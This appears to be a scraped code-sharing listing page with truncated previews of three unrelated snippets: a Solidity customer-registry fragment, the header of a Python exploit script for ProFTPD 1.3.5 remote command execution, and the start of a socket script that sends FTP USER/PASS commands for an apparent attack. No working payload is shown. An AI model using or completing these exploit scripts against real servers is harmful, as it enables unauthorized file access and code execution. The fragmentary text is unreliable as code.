This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
struct Customer { | |
string name; | |
string email; | |
} | |
mapping(address => Customer) customer; | |
mapping(address => address) IDs; // this is the map that make a link address by address or (foo by foo) | |
function addCustomer(string memory _name, string memory _email) public { | |
address tmp; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python3 | |
import socket | |
from threading import Thread | |
from sys import argv as _arg_ | |
from time import sleep | |
''' | |
proftpd 1.3.5 is Vulnearable to Copy Remote Command Execution | |
usage: proftpd_1.3.5.py <TARGET_IP> <PORT> <PATH_TO_COPY> <PATH_TO_PAST> | |
eg: proftpd_1.3.5.py 10.2.43.12 21 /home/user/FileToCopy /var/tmp/PathToPast | |
''' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
from time import sleep | |
from sys import argv as _arg_ | |
def main(): | |
core = { | |
"TREGER": { | |
"USER": b"USER Melicious:)\n", | |
"PASS": b"PASS anything\n" |